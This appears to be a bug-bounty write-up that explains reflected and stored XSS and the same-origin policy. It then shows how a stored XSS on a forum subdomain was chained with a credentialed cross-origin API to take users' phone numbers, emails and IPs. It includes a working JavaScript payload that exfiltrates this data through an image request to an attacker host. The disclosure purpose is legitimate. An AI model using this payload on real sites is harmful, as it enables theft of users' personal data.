Exploiting XSS Vulnerabilities and Same‑Origin Policy to Upgrade Risk Levels

Introduction

Security Emergency Response (SRC) platforms accept vulnerability reports from users and reward researchers. This article focuses on the most common OWASP Top 10 vulnerability—Cross‑Site Scripting (XSS)—and demonstrates how to turn a low‑severity reflected XSS into a high‑severity issue by combining it with same‑origin policy abuse.

What is XSS?

Cross‑Site Scripting allows an attacker to inject malicious HTML/JavaScript into a vulnerable page so that the code runs in the browsers of other users.

1. Reflected XSS

1. Attacker places JavaScript code in the URL as a request parameter and lures the user to click it, e.g. http://localhost:8080/test?name=<script>alert("you are under attack!")</script> . 2. The user clicks the link; the JS is sent to the web server. 3. The backend fails to filter the input and returns the script in the page. 4. The browser renders the page and executes the script.

2. Stored XSS

1. Attacker posts a comment containing a malicious script. 2. The comment is stored in the database. 3. Other users view the comment; the server retrieves it and renders it in the page. 4. The victim's browser executes the script.

Same‑Origin Policy

Same‑origin policy (SOP) is a core browser security mechanism that restricts scripts from accessing resources from a different origin. It underpins the security model of the web.

Vulnerability Discovery Process

Target: an SRC forum site.

1. A sub‑domain contains a link that reveals a stored XSS. 2. Another sub‑domain exposes an API that can be called cross‑origin to retrieve user phone numbers, email addresses, and IP information.

Vulnerability Details

Step 1: Verify the stored XSS

Example URL: https://act.zzzzzz.cn/index.php?mod=book&action=mobile&id=9

The comment field on this page contains a stored XSS payload.

Step 2: Exploit cross‑origin API to harvest user data

API URL: https://bbs-act.zzzzzzz.cn/index.php?mod=index&action=win_list&limit=1&id=2

By combining the two vulnerabilities, a malicious link is placed in the XSS page that calls the cross‑origin API and forwards the retrieved phone, email, and IP address to an attacker‑controlled server.

Step 3: JavaScript payload

var xhttp = new XMLHttpRequest();
xhttp.onreadystatechange = function() {
  if (this.readyState == 4 && this.status == 200) {
    var aa = JSON.parse(this.responseText);
    console.log(aa['data']['user']['phone'] + ',' + aa['data']['user']['email']);
    var s = document.createElement('img');
    document.body.appendChild(s);
    s.src = '//xxx.xxxxxx.cn?phone=' + aa['data']['user']['phone'] + '&email=' + aa['data']['user']['email'] + '&clientip=' + aa['data']['user']['clientip'];
  }
};
xhttp.open("GET", "https://bbs-act.zzzzz.cn/index.php?mod=index&action=win_list&limit=20&id=2", true);
xhttp.withCredentials = true;
xhttp.send();

Step 4: Verify the effect

Visiting the crafted forum link returns the victim’s phone number, email address, and IP address, effectively upgrading the vulnerability from low to high severity.

Submit the vulnerability to the SRC platform and claim the reward.